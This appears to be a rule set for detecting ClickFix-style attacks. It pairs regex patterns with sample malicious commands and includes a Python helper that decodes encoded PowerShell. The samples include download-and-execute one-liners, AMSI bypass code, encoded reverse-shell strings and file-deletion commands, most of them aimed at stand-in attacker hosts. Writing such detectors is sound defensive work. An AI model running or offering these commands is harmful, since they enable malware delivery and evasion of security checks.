[01] Base64 Powershell
Detects PowerShell executing base64-encoded commands. Strong indicator of ClickFix attacks hiding malicious payloads.
(?i)(powershell.*-\s*(?:e|enc|encodedcommand)(?:\^?[a-z])*?\s+[A-Za-z0-9+/]{20,}={0,2})
Malicious examples:
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AZQB2AGkAbAAuAGMAbwBtAC8AcAAuAHAAcwAxACIAKQA=
powershell.exe -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEUA
powershell -e SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0AA==
POWERSHELL -ENC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
PowerShell.exe -EncodedCommand VwByAGkAdABlAC0ASABvAHMAdAAgACIASABlAGwAbABvACIA
powershell -encoded cABvAHcAZQByAHMAaABlAGwAbAAgAC0AYwAgAA==
powershell -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIA
powershell.exe -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0AA==
powershell -encodedcommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvAG0AYQBsAHcAYQByAGUALgBjAG8AbQAvAHAAYQB5AGwAbwBhAGQALgBwAHMAMQAiACkA
powershell.exe -nop -ep bypass -enc cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAGMAYQBsAGMA
cmd /c powershell -e VwByAGkAdABlAC0ASABvAHMAdAAgACIATQBhAGwAaQBjAGkAbwB1AHMAIQ==
powershell -ep bypass -w hidden -encodedcommand ZQB4AGUAYwAoACIAbQBhAGwAaQBjAGkAbwB1AHMAIABJAG4AZgBvAHIAbQBhAHQAaQBvAG4AIgApAA==
powershell -E^N^C SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
powershell.exe -e^n^c^o^d^e^d^c^o^m^m^a^n^d JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAA=
cmd /c powershell -e^nc VwByAGkAdABlAC0ASABvAHMAdAAgACIATQBhAGwAaQBjAGkAbwB1AHMAIQ==
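Once rule [01] fires, the next question for an analyst is what the encoded argument actually says. The following Python is an added example, not code from the page's rule set: it applies the page's rule [01] pattern verbatim, then isolates the base64 argument with a second expression of its own (BLOB, an assumption, because the page's pattern captures the whole command rather than the blob) and decodes it the way PowerShell reads it, as base64 of UTF-16LE text. The sample lines are the page's first and nineteenth examples plus one constructed benign line; `triage` and `decode_encoded_command` are names chosen here.

```python
import base64
import re

# Rule [01] from the page, copied verbatim.
RULE_01 = re.compile(
    r"(?i)(powershell.*-\s*(?:e|enc|encodedcommand)(?:\^?[a-z])*?\s+[A-Za-z0-9+/]{20,}={0,2})"
)

# Assumed helper pattern (not from the page): the rule captures the whole command,
# so a second expression isolates the encoded argument itself, a whitespace-delimited
# run of 20+ base64 characters with optional '=' padding.
BLOB = re.compile(r"(?:^|\s)([A-Za-z0-9+/]{20,}={0,2})(?=\s|$)")


def decode_encoded_command(line):
    """Decode the -EncodedCommand argument of a line that trips rule [01].

    Returns None when the rule does not fire, the decoded script when it does,
    or '<undecodable>' when the blob is not valid base64 of UTF-16LE text
    (a truncated log field is the usual cause)."""
    if RULE_01.search(line) is None:
        return None
    m = BLOB.search(line)
    if m is None:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")  # PowerShell encodes the script as UTF-16LE
    except (ValueError, UnicodeDecodeError):
        return "<undecodable>"


# Constructed sample: the page's examples 1 and 19, plus a benign line.
SAMPLE_LINES = [
    "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AZQB2AGkAbAAuAGMAbwBtAC8AcAAuAHAAcwAxACIAKQA=",
    "powershell.exe -e^n^c^o^d^e^d^c^o^m^m^a^n^d JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAA=",
    "powershell -Command Get-Process",
]


def triage(lines):
    """Map each line to its decoded command (None when rule [01] did not fire)."""
    return {line: decode_encoded_command(line) for line in lines}


if __name__ == "__main__":
    for line, decoded in triage(SAMPLE_LINES).items():
        print(f"{line[:60]:<60} -> {decoded!r}")
```

The caret-split flag in the second sample line is matched by the page's pattern but plays no part in decoding, since the blob itself is never obfuscated that way; what does break decoding in practice is log truncation, which is why the function reports `<undecodable>` rather than raising.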
[02] Iex Download First
Detects PowerShell downloading and executing remote scripts with IEX. Hallmark of fileless malware attacks.
(?i)((iwr|invoke-webrequest|wget|curl|webclient.*downloadstring).*\|.*(iex|invoke-expression))
Malicious examples:
IWR http://evil.com/payload.ps1 | IEX
Invoke-WebRequest https://malware.com/script.ps1 | Invoke-Expression
curl http://attacker.com/malicious.ps1 | IEX
wget https://evil.com/backdoor.ps1 | Invoke-Expression
IWR http://bad.com/p.ps1 -UseBasicParsing | IEX
powershell -c "IWR http://evil.com/s.ps1 | IEX"
curl https://attacker.com/payload.ps1 -UseBasicParsing | Invoke-Expression
iwr http://evil.com/clickfix.ps1|iex
powershell -command "iwr update.coinmarketsap.com | iex"
iwr evil.com/payload.ps1 | iex
Invoke-WebRequest malware-site.net/script.ps1 | IEX
Invoke-WebRequest -Uri http://malware.com/stage2.ps1 -UseBasicParsing|IEX
(New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1') | IEX
IWR 'http://evil.com/payload.ps1' -UseBasicParsing|iex
Invoke-WebRequest -Uri "https://evil.com/stager.ps1" | Invoke-Expression
curl http://malware.com/reverse-shell.ps1 -UseBasicParsing|IEX
[03] Download Iex Pipe
Detects WebClient.DownloadString piped to IEX. Classic ClickFix pattern for in-memory script execution.
(?i)((iex|invoke-expression).*webclient.*download(string|file).*https?://|webclient.*download(string|file).*https?://.*(iex|invoke-expression|\|))
Malicious examples:
(New-Object Net.WebClient).DownloadString("http://evil.com/p.ps1") | IEX
(New-Object Net.WebClient).DownloadString('https://malware.com/script.ps1') | Invoke-Expression
powershell -c "(New-Object Net.WebClient).DownloadString('http://attacker.com/mal.ps1') | IEX"
(New-Object Net.WebClient).DownloadString("https://bad.com/payload.ps1")|IEX
IEX (New-Object Net.WebClient).DownloadString("http://evil.com/dropper.ps1")
powershell (New-Object Net.WebClient).DownloadString("http://attacker.com/p.ps1")|IEX
IEX(New-Object Net.WebClient).DownloadString('http://evil.com/clickfix.ps1')
Invoke-Expression (New-Object Net.WebClient).DownloadString('https://malware.com/implant.ps1')
(New-Object System.Net.WebClient).DownloadString('http://attacker.com/stager.ps1')|IEX
IEX ((New-Object Net.WebClient).DownloadString('https://bad.com/loader.ps1'))
powershell -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/backdoor.ps1')"
iex (New-Object Net.WebClient).DownloadString('http://attacker.com/obfuscated.ps1')
[04] Mshta
Detects mshta.exe executing remote HTA files or inline scripts. Commonly abused to bypass application whitelisting.
(?i)(mshta(\.exe)?\s+(https?://|ftp://|javascript:|vbscript:|about:|data:))
Malicious examples:
mshta http://evil.com/payload.hta
mshta http://81.0x5a.29.64/ebc/rps.gz
mshta javascript:alert('XSS');close();
mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run(""calc.exe"")")
mshta about:<html><script>alert('xss')</script></html>
mshta.exe https://malware.com/dropper.hta
MSHTA http://attacker.com/backdoor.hta
mshta.exe javascript:eval('malicious code here')
mshta vbscript:CreateObject("WScript.Shell").Run("powershell -enc payload")
mshta http://evil.com/clickfix.hta
mshta https://malware.com/stage2.hta
mshta.exe javascript:close(new ActiveXObject('WScript.Shell').Run('cmd /c evil'))
mshta about:blank
mshta.exe ftp://evil.com/malicious.hta
mshta data:text/html,<script>alert('XSS')</script>
cmd /c mshta javascript:a=GetObject('script:https://attacker.com/payload.sct').Exec()
[05] Certutil
Detects certutil downloading files from URLs. Extremely common in ClickFix attacks (50-55% prevalence). Legitimate certificate tool frequently abused for malware delivery.
(?i)(certutil.*-url(cache)?.*(http|ftp)s?://)
Malicious examples:
certutil -urlcache -f http://evil.com/malware.exe C:\malware.exe
certutil.exe -urlcache -split -f https://attacker.com/payload.dll payload.dll
certutil -url http://malware.com/backdoor.exe backdoor.exe
CERTUTIL -URLCACHE -F http://evil.com/dropper.exe dropper.exe
certutil.exe -urlcache https://bad.com/trojan.dll C:\Windows\Temp\trojan.dll
certutil -urlcache -split -f ftp://evil.com/malware.exe mal.exe
certutil -f -split -urlcache http://attacker.com/evil.dll
certutil.exe -urlcache -f "http://evil.com/clickfix.exe" clickfix.exe
certutil -urlcache http://malware.com/payload.exe C:\Temp\payload.exe
certutil.exe -url -f https://evil.com/backdoor.dll backdoor.dll
certutil -urlcache -f http://192.168.1.100/malware.bin malware.bin
cmd /c certutil -urlcache -f http://evil.com/stage2.dll stage2.dll
certutil.exe -f -urlcache https://evil.com/implant.exe implant.exe
certutil -url https://malware.com/loader.dll -f loader.dll
[06] Bitsadmin
Detects bitsadmin downloading files from URLs. Common in ClickFix attacks (35-45% prevalence). Windows background transfer utility abused for payload downloads.
(?i)(bitsadmin.*/(transfer|download|addfile).*(https?|ftp)://)
Malicious examples:
bitsadmin /transfer job http://evil.com/malware.exe C:\malware.exe
bitsadmin.exe /transfer download https://attacker.com/payload.dll payload.dll
BITSADMIN /TRANSFER myJob /DOWNLOAD /PRIORITY HIGH http://evil.com/backdoor.exe backdoor.exe
bitsadmin /transfer dl http://malware.com/trojan.exe C:\Temp\trojan.exe
bitsadmin.exe /transfer downloadJob ftp://evil.com/dropper.exe dropper.exe
bitsadmin /transfer job1 http://bad.com/evil.dll C:\Windows\Temp\evil.dll
bitsadmin.exe /transfer "My Job" https://attacker.com/clickfix.exe clickfix.exe
bitsadmin /transfer test http://evil.com/payload.exe C:\Users\Public\payload.exe
bitsadmin.exe /transfer jobName /download /priority foreground http://malware.com/mal.exe mal.exe
bitsadmin /transfer download http://evil.com/backdoor.dll backdoor.dll
bitsadmin.exe /transfer ransomware https://attacker.com/encrypt.exe C:\Temp\encrypt.exe
bitsadmin /transfer implant /priority normal http://evil.com/implant.dll implant.dll
cmd /c bitsadmin /transfer mal http://192.168.1.100/malware.bin C:\malware.bin
bitsadmin.exe /transfer "Update Job" ftp://malware.com/update.exe C:\Users\victim\update.exe
bitsadmin /transfer stage2 https://evil.com/stage2.ps1 C:\Windows\Temp\stage2.ps1
bitsadmin.exe /transfer /download /priority high http://attacker.com/loader.exe loader.exe
bitsadmin /transfer clickfix http://evil.com/clickfix-installer.msi C:\Temp\installer.msi
bitsadmin.exe /transfer backdoor /priority foreground https://malware.com/backdoor.exe backdoor.exe
bitsadmin /transfer "System Update" http://evil.com/fake-update.exe C:\ProgramData\update.exe
bitsadmin.exe /addfile myJob http://evil.com/malware.dll C:\malware.dll
[07] Amsi Bypass
Detects AMSI bypass attempts. Critical indicator of evasion techniques.
(?i)((amsiutils|amsiinitfailed|amsicontext).*(setvalue|bypass|nonpublic|=\s*\$true)|ref.*assembly.*gettype.*amsi)
Malicious examples:
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
$amsi = [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils")
[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext')
powershell -c "$x=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$x.GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"
$a=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$a.GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
[System.Management.Automation.AmsiUtils]::amsiInitFailed = $true
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiSession','NonPublic,Static').SetValue($null,$null)
[System.Management.Automation.AmsiUtils].GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('s_amsiContext','NonPublic,Static').SetValue($null,[IntPtr]::Zero)
[08] Powershell Flags
Detects PowerShell with suspicious flag combinations like hidden windows and bypassed execution policy.
(?i)(powershell.*-w(indowstyle)?\s+h(idden)?|-w(indowstyle)?\s+h(idden)?.*-e(p|xecutionpolicy)?\s+(bypass|unrestricted)|-e(p|xecutionpolicy)?\s+(bypass|unrestricted).*-w(indowstyle)?\s+h(idden)?)
Malicious examples:
powershell -w hidden -c "malicious code"
powershell.exe -WindowStyle Hidden -Command "IWR http://evil.com/p.ps1 | IEX"
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File malicious.ps1
powershell -ep bypass -w hidden -c "evil command"
powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "backdoor"
powershell -w h -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://evil.com/p.ps1')"
POWERSHELL -WINDOWSTYLE HIDDEN -EXECUTIONPOLICY BYPASS malware.ps1
powershell -ep unrestricted -w hidden malicious.ps1
powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden script.ps1
powershell -nop -w h -ep bypass -c "evil"
powershell.exe -WindowStyle h -ExecutionPolicy bypass -Command "malware"
powershell -w hidden -nop -ep bypass -c "(New-Object Net.WebClient).DownloadString('http://evil.com/s.ps1')|IEX"
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command "backdoor"
powershell -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass clickfix.ps1
powershell.exe -NoProfile -w hidden -ep bypass -c "curl http://evil.com/p.ps1 | iex"
cmd /c powershell -w hidden -nop -ep bypass -c "malicious"
powershell -WindowStyle Hidden -NoProfile -ep bypass -c "IWR http://attacker.com/payload.ps1|IEX"
[09] Regsvr32
Detects regsvr32 executing remote scriptlets or DLLs. Application whitelisting bypass technique. Detects various flag combinations, URL protocols (HTTP/HTTPS/FTP), and .sct file extensions.
(?i)(regsvr32.*(https?://|ftp://.*\.sct|scrobj\.dll.*https?://|\.sct))
Malicious examples:
regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dll
regsvr32.exe /u /i:https://attacker.com/malicious.sct scrobj.dll
REGSVR32 /I:http://malware.com/backdoor.sct SCROBJ.DLL
regsvr32 /s /i:"http://evil.com/dropper.sct" scrobj.dll
regsvr32.exe /u /n /i:ftp://evil.com/payload.sct scrobj.dll
regsvr32 /i:http://bad.com/clickfix.sct scrobj.dll
regsvr32.exe /s /i:https://192.168.1.100/malware.sct scrobj.dll
regsvr32 /u /i:http://attacker.com/stage2.sct scrobj.dll
cmd /c regsvr32 /s /n /u /i:http://evil.com/implant.sct scrobj.dll
regsvr32.exe /i:https://malware.com/ransomware.sct scrobj.dll
regsvr32 /s /u /i:ftp://evil.com/trojan.sct scrobj.dll
regsvr32.exe /i:"http://evil.com/clickfix-installer.sct" scrobj.dll
regsvr32 /s /n /i:https://attacker.com/loader.sct scrobj.dll
regsvr32.exe C:\Temp\malicious.sct
regsvr32 /u /i:http://evil.com/backdoor.sct scrobj.dll
regsvr32.exe /s /i:https://malware.com/obfuscated.sct scrobj.dll
regsvr32 C:\Users\Public\Downloads\dropper.sct
regsvr32.exe /u /n /i:http://192.168.1.50:8080/payload.sct scrobj.dll
regsvr32 /i:https://evil.com/reverse-shell.sct scrobj.dll
regsvr32.exe /s C:\Windows\Temp\evil.sct
[10] Osascript
Detects osascript executing remote scripts or inline AppleScript. macOS-specific attack vector.
(?i)(osascript.*do\s+shell\s+script.*(curl|wget|bash|sh|python|ruby|perl|rm|chmod|sudo|launchctl))
Malicious examples:
osascript -e 'do shell script "curl http://evil.com/malware.sh | bash"'
osascript -e 'do shell script "wget http://attacker.com/backdoor.sh -O /tmp/b.sh && bash /tmp/b.sh"'
osascript -e 'do shell script "python -c 'import urllib; exec(urllib.urlopen(''http://evil.com/p.py'').read())'"'
osascript -e 'do shell script "curl -s http://malware.com/dropper.sh | sh"'
osascript -e 'do shell script "ruby -e 'require ''net/http''; eval(Net::HTTP.get(URI(''http://evil.com/s.rb'')))'"'
osascript -e 'do shell script "bash <(curl -s http://attacker.com/payload.sh)"'
osascript -e 'do shell script "wget -qO- http://evil.com/clickfix.sh | bash"'
osascript -e 'do shell script "curl http://malware.com/implant.py | python"'
osascript -e 'do shell script "sh -c '$(curl -fsSL http://evil.com/stage2.sh)'"'
osascript -e 'do shell script "perl -e 'use LWP::Simple; eval(get(''http://attacker.com/p.pl''))'"'
osascript -e 'do shell script "curl http://evil.com/ransomware.sh | sudo bash"'
osascript -e 'do shell script "wget http://malware.com/backdoor.rb -O /tmp/b.rb && ruby /tmp/b.rb"'
osascript -e 'do shell script "bash -c 'curl http://evil.com/trojan.sh | bash'"'
osascript -e 'do shell script "python3 -c 'import urllib.request; exec(urllib.request.urlopen(''http://evil.com/mal.py'').read())'"'
osascript -e 'do shell script "curl -L http://attacker.com/loader.sh | sh"'
osascript -e 'do shell script "rm -rf /important/data && curl http://evil.com/notify"'
osascript -e 'do shell script "chmod +x /tmp/malware && /tmp/malware"'
osascript -e 'do shell script "curl http://evil.com/cron.sh | bash && launchctl load /tmp/persistence.plist"'
osascript -e 'do shell script "wget -O /tmp/dropper http://malware.com/dropper && chmod 755 /tmp/dropper && /tmp/dropper"'
osascript -e 'do shell script "bash <(wget -qO- http://evil.com/obfuscated.sh)"'
osascript -e 'do shell script "curl -s http://attacker.com/reverse.sh | sh -s"'
osascript -e 'do shell script "python -m http.server 8080 & curl http://evil.com/exfil.sh | bash"'
osascript -e 'do shell script "sudo curl http://malware.com/rootkit.sh | bash"'
osascript -e 'do shell script "perl -MLWP::Simple -e 'eval(get(''http://evil.com/payload.pl''))'"'
osascript -e 'do shell script "curl http://192.168.1.100/malware.sh | bash"'
[11] Bash Pipe Shell
Detects curl or wget downloads piped into a shell interpreter (bash, sh, zsh). Requires context to distinguish from legitimate admin tasks.
(?i)(^(?![\s]*#)(curl|wget).*(https?|ftp)://.*\|.*(bash|sh|zsh))
Malicious examples:
curl http://evil.com/malware.sh | bash
wget -qO- http://attacker.com/payload.sh | sh
curl -s https://malware.com/exploit.sh | bash
wget -O - http://evil.com/dropper.sh | zsh
curl http://bad.com/backdoor.sh | sh
wget -qO- http://192.168.1.100/clickfix.sh | bash
curl -fsSL http://evil.com/installer.sh | sudo bash
wget --quiet -O - http://attacker.com/ransomware.sh | sh
curl -s http://malware.com/reverse-shell.sh | bash -
wget -qO- ftp://evil.com/exploit.sh | zsh
curl -L http://evil.com/stage2.sh | bash
wget -O- http://attacker.com/implant.sh | sh
curl --silent http://evil.com/loader.sh | sudo sh
wget -q -O - http://malware.com/backdoor.sh | bash
curl -sSL http://evil.com/dropper.sh | ksh
wget -qO- http://attacker.com/trojan.sh | bash -x
curl http://evil.com/persistence.sh | sh -s
wget --no-check-certificate https://malware.com/payload.sh -O - | bash
curl -fsSL http://evil.com/obfuscated.sh | bash -c 'cat | bash'
wget -qO- http://192.168.1.50:8080/malware.sh | zsh
[12] Base64 Shell Decode
Detects base64 encoded commands decoded and executed in shell. Common in Linux/macOS ClickFix attacks.
(?i)(echo.*\|.*base64.*(--decode|-d)|base64.*(--decode|-d).*\|.*(bash|sh|zsh|eval))
Malicious examples:
bash -c "echo SGFja2Vk | base64 -d | bash"
sh -c "echo $(echo ZXZpbF9jb21tYW5k | base64 -d)"
sh -c "echo SGFja2VyX2NvbW1hbmQ= | base64 --decode | sh"
bash -c "echo Y3VybCBodHRwOi8vZXZpbC5jb20vcGF5bG9hZC5zaA== | base64 -d"
sh -c "echo cHdkOyBjdXJsIGh0dHA6Ly9ldmlsLmNvbS9wYXlsb2FkLnNo | base64 -d"
bash -c "echo d2dldCBodHRwOi8vZXZpbC5jb20vbWFsd2FyZS5zaA== | base64 --decode | bash"
sh -c "echo Y3VybCAtcyBodHRwOi8vYXR0YWNrZXIuY29tL2Ryb3BwZXIuc2g= | base64 -d | sh"
bash -c "echo bmMgLWUgL2Jpbi9iYXNoIGV2aWwuY29tIDQ0NDQ= | base64 -d"
sh -c "echo cHl0aG9uIC1jICdleGVjKC4uLik=' | base64 --decode"
bash -c "echo $(echo bWFsaWNpb3VzX2NvbW1hbmQ= | base64 -d)"
echo Y3VybCBodHRwOi8vZXZpbC5jb20vc2NyaXB0LnNofGJhc2g= | base64 -d | bash
echo d2dldCAtcU8tIGh0dHA6Ly9ldmlsLmNvbS9wYXlsb2FkLnNofHNo | base64 --decode | sh
echo SGFja2VyIHBheWxvYWQ= | base64 -d | eval
eval "$(echo ZXZpbCBjb21tYW5k | base64 -d)"
(echo bWFsaWNpb3VzX2NvbW1hbmQ= | base64 -d) | bash
echo Y3VybCBodHRwOi8vYXR0YWNrZXIuY29tL21hbHdhcmUuc2ggfCBiYXNo | base64 --decode | bash
echo $(echo ZG93bmxvYWQgYW5kIGV4ZWN1dGU= | base64 -d | sh)
bash -c "echo cHl0aG9uIC1jIGltcG9ydCB1cmxsaWI= | base64 -d"
zsh -c "echo Y3VybCBodHRwOi8vbWFsd2FyZS5jb20= | base64 -d | zsh"
echo SGFja2VkIQ== | base64 --decode | bash
[13] Shell Substitution Download
Detects shell command substitution, backticks, and process substitution downloading remote scripts.
(?i)((\$\(|`|<\()(curl|wget).*(https?|ftp)://)
Malicious examples:
$(curl http://evil.com/malware.sh | bash)
echo $(wget -qO- http://attacker.com/payload.sh) | sh
$(curl -s https://malware.com/backdoor.sh | sh)
bash -c "$(wget -O - http://evil.com/dropper.sh)"
$(curl http://bad.com/script.sh)
sh -c "$(wget -qO- https://evil.com/exploit.sh)"
$(curl -fsSL http://attacker.com/install.sh | bash)
eval $(wget -qO- ftp://evil.com/payload.sh)
payload=$(curl http://attacker.com/malware.sh); eval $payload
$(curl -H 'User-Agent: Mozilla' http://evil.com/obfuscated.sh | sh)
$(curl -L http://evil.com/stage2.sh) | bash
$(wget -qO- https://evil.com/ransomware.sh) | sudo bash
eval "$(curl -s http://malware.com/loader.sh)"
cmd=$(curl http://evil.com/command.sh); sh -c "$cmd"
$(curl -k https://attacker.com/payload.sh | bash -s)
$(curl ftp://attacker.com/dropper.sh) > /tmp/d.sh && bash /tmp/d.sh
`curl http://evil.com/script.sh | bash`
`wget -qO- http://attacker.com/malware.sh | sh`
eval `curl -s https://evil.com/payload.sh`
`wget -O - http://malware.com/dropper.sh`
sh -c "`curl http://evil.com/backdoor.sh`"
bash <(curl http://evil.com/script.sh)
sh <(wget -qO- https://attacker.com/payload.sh)
bash <(curl -s http://malware.com/installer.sh)
eval "bash <(curl http://evil.com/exploit.sh)"
sudo bash <(wget -qO- ftp://evil.com/dropper.sh)
bash <(curl -fsSL http://attacker.com/malware.sh)
[14] Filefix Powershell Path
Detects PowerShell scripts in suspicious temp locations. Common malware staging area.
(?i)(powershell.*([Tt]emp|AppData|Users.{0,2}Public|ProgramData|/tmp|/var/tmp).*\.ps1)
Malicious examples:
powershell -File C:\Windows\Temp\malicious.ps1
powershell -ExecutionPolicy Bypass C:\Temp\backdoor.ps1
powershell.exe C:\Users\Public\Downloads\evil.ps1
powershell -File "C:\Users\victim\AppData\Local\Temp\dropper.ps1"
powershell /tmp/malware.ps1
powershell -File /var/tmp/exploit.ps1
powershell.exe -ExecutionPolicy Bypass C:\Temp\clickfix.ps1
powershell -File "C:\Windows\Temp\payload.ps1"
powershell C:\Users\user\AppData\Local\Temp\attack.ps1
powershell -Command C:\Users\Public\malware.ps1
powershell.exe C:\Users\victim\AppData\Roaming\backdoor.ps1
powershell -nop -ep bypass -File C:\ProgramData\trojan.ps1
powershell.exe -File C:\Users\Public\Documents\dropper.ps1
powershell C:\Temp\evil.ps1
powershell . C:\Windows\Temp\stager.ps1
powershell /tmp/clickfix-installer.ps1
cmd /c powershell -File C:\Temp\malware.ps1
[15] Rundll32
Detects rundll32 loading DLLs from remote URLs or from suspicious temp locations, or running inline javascript:/vbscript: payloads. Living-off-the-land technique for stealthy execution.
(?i)(rundll32.*(javascript:|vbscript:|about:|(https?|ftp)://|(temp|appdata|public|programdata|/tmp).*\.dll.*(execute|entrypoint|run|start|main|dllmain|dllregisterserver|loader|init|launch)))
Malicious examples:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();eval("malicious")
rundll32 C:\Temp\evil.dll,EntryPoint
rundll32.exe C:\Users\victim\AppData\Local\Temp\malware.dll,Start
rundll32 http://evil.com/payload.dll
rundll32.exe C:\Windows\Temp\backdoor.dll,Run
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";new ActiveXObject("WScript.Shell").Run("cmd /c malicious")
rundll32 C:\Users\Public\Downloads\trojan.dll,Execute
rundll32.exe C:\ProgramData\malware.dll,DllMain
rundll32 vbscript:Execute("CreateObject(""WScript.Shell"").Run(""calc.exe"")")(window.close)
rundll32.exe C:\Temp\clickfix.dll,Loader
rundll32 javascript:"\..\mshtml,RunHTMLApplication ";document.write("<script>eval(atob(\"base64payload\"))</script>")
rundll32.exe C:\Users\victim\AppData\Roaming\implant.dll,Init
rundll32 C:\Windows\Temp\ransomware.dll,Launch
rundll32.exe about:blank javascript:eval("malicious code")
rundll32 /tmp/malware.dll,Execute
rundll32.exe C:\Users\Public\dropper.dll,EntryPoint
cmd /c rundll32 javascript:"\..\mshtml,RunHTMLApplication ";window.resizeTo(0,0);eval("evil")
rundll32 C:\ProgramData\backdoor.dll,Run
rundll32.exe https://attacker.com/payload.dll
rundll32 C:\Users\victim\AppData\Local\Temp\stage2.dll,Start
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.body.innerHTML="<script src=http://evil.com/mal.js></script>"
rundll32 C:\Temp\persistence.dll,DllRegisterServer
rundll32.exe ftp://evil.com/malicious.dll
rundll32 C:\Windows\Temp\obfuscated.dll,Main
rundll32.exe C:\Users\Public\Documents\trojan.dll,Execute
[16] Installutil
Detects installutil executing untrusted assemblies. .NET tool abused for code execution bypass. Focuses on assemblies loaded from suspicious temp locations with common evasion flags.
(?i)(installutil.*(temp|appdata|public|programdata).*\.(exe|dll))
Malicious examples:
InstallUtil.exe C:\Temp\malware.exe
installutil.exe /U C:\Windows\Temp\backdoor.dll
InstallUtil C:\Users\victim\AppData\Local\Temp\evil.exe
installutil.exe /logfile= /LogToConsole=false C:\Temp\trojan.exe
InstallUtil.exe /U C:\Users\Public\clickfix.exe
installutil C:\ProgramData\implant.dll
InstallUtil.exe /uninstall C:\Windows\Temp\ransomware.exe
installutil.exe /LogToConsole=false C:\Temp\dropper.dll
InstallUtil /U /logfile= C:\Users\victim\AppData\Local\Temp\stage2.exe
installutil.exe C:\Users\Public\Documents\malicious.exe
InstallUtil.exe /logtoconsole=false C:\Windows\Temp\loader.dll
installutil /U C:\ProgramData\backdoor.exe
InstallUtil.exe C:\Users\guest\AppData\Local\Temp\trojan.dll
installutil.exe /logfile= C:\Temp\persistence.exe
InstallUtil /uninstall /LogToConsole=false C:\Windows\Temp\obfuscated.dll
installutil.exe C:\Users\Public\Downloads\malware.exe
InstallUtil.exe /U /logtoconsole=false C:\ProgramData\evil.dll
cmd /c installutil.exe C:\Temp\clickfix-installer.exe
InstallUtil C:\Users\victim\AppData\Roaming\implant.exe
installutil.exe /logfile= /U C:\Windows\Temp\stager.dll
[17] Command Chain
Detects download commands chained with execution. Multi-stage attack pattern for automated payload delivery.
(?i)((certutil|bitsadmin|curl|wget|powershell|iwr).*(https?|ftp)://.*(\&\&|\|\||;|\|).*(cmd|powershell|bash|sh|rundll32|regsvr32|mshta|wscript|cscript|\.exe|\.bat|\.vbs))
Malicious examples:
certutil -urlcache -f http://evil.com/malware.exe C:\malware.exe && C:\malware.exe
powershell -c "IWR http://evil.com/p.ps1 -OutFile p.ps1" && powershell -ExecutionPolicy Bypass p.ps1
curl http://malware.com/bad.dll -o bad.dll && rundll32 bad.dll,EntryPoint
bitsadmin /transfer job http://evil.com/trojan.exe trojan.exe && cmd /c trojan.exe
wget http://evil.com/payload.sh -O payload.sh && bash payload.sh
certutil -urlcache http://evil.com/evil.dll evil.dll && regsvr32 evil.dll
powershell IWR http://evil.com/script.ps1 -OutFile s.ps1 && powershell s.ps1
wget http://evil.com/dropper.hta -O d.hta && mshta d.hta
curl http://attacker.com/backdoor.exe -o C:\Temp\backdoor.exe && C:\Temp\backdoor.exe
certutil -urlcache -f http://evil.com/payload.exe payload.exe && start payload.exe
powershell IWR http://malware.com/mal.ps1 -OutFile mal.ps1 && powershell -nop -ep bypass mal.ps1
wget http://evil.com/exploit.sh && sh exploit.sh
curl http://attacker.com/trojan.dll -o trojan.dll && regsvr32 /s trojan.dll
bitsadmin /transfer job http://evil.com/clickfix.exe clickfix.exe && clickfix.exe
certutil -urlcache -f http://evil.com/malware.vbs malware.vbs && wscript malware.vbs
